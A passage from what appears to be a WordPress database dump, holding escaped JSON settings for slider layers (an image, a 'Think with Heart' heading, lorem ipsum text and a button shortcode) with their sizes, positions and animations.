e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 3\",\"alias\":\"Cube\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic3.jpg\",\"imageId\":631},\"size\":{\"width\":{\"d\":{\"v\":\"714px\",\"e\":true},\"n\":{\"v\":\"616px\",\"e\":true},\"t\":{\"v\":\"651px\",\"e\":true},\"m\":{\"v\":\"614px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"353px\",\"e\":true},\"n\":{\"v\":\"305px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"303px\",\"e\":true}},\"originalWidth\":714,\"originalHeight\":353,\"aspectRatio\":{\"d\":{\"v\":2.0226628895184136},\"n\":{\"v\":2.0226628895184136},\"t\":{\"v\":2.0226628895184136},\"m\":{\"v\":2.0226628895184136}}},\"position\":{\"x\":{\"d\":{\"v\":\"-391px\",\"e\":true},\"n\":{\"v\":\"-212px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"117px\",\"e\":true},\"t\":{\"v\":\"135px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power1.out\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"

Think with<\\/span> Heart<\\/h1>\",\"alias\":\"Think with Heart\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"398px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"76px\",\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-450px\",\"e\":true},\"n\":{\"v\":\"-242px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"93px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"370px\",\"e\":true},\"m\":{\"v\":\"73px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\\n Maecenas interdum eu lacus dapibus finibus. Pellentesque vehicula, metus ut tincidunt euismod, arcu quam lobortis nulla, ut pretium nisi sem sed.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"v\":\"620px\",\"e\":true},\"n\":{\"v\":\"540px\",\"e\":true},\"t\":{\"v\":\"558px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"78px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"126px\",\"e\":true}},\"originalWidth\":\"620px\",\"originalHeight\":\"76px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-377px\",\"e\":true},\"n\":{\"v\":\"-210px\",\"e\":true},\"t\":{\"v\":\"104px\",\"e\":true},\"m\":{\"v\":\"-464px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"199px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"260px\",\"e\":true},\"m\":{\"v\":\"463px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"588px\",\"e\":true},\"n\":{\"v\":\"464px\",\"e\":true},\"t\":{\"v\":\"588px\",\"e\":true},\"m\":{\"v\":\"411px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"588px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-392px\",\"e\":true},\"n\":{\"v\":\"-247px\",\"e\":true},\"t\":{\"v\":\"105px\",\"e\":true},\"m\":{\"v\":\"64px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"287px\",\"e\":true},\"n\":{\"v\":\"197px\",\"e\":true},\"t\":{\"v\":\"180px\",\"e\":true},\"m\":{\"v\":\"210px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(20,8,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left 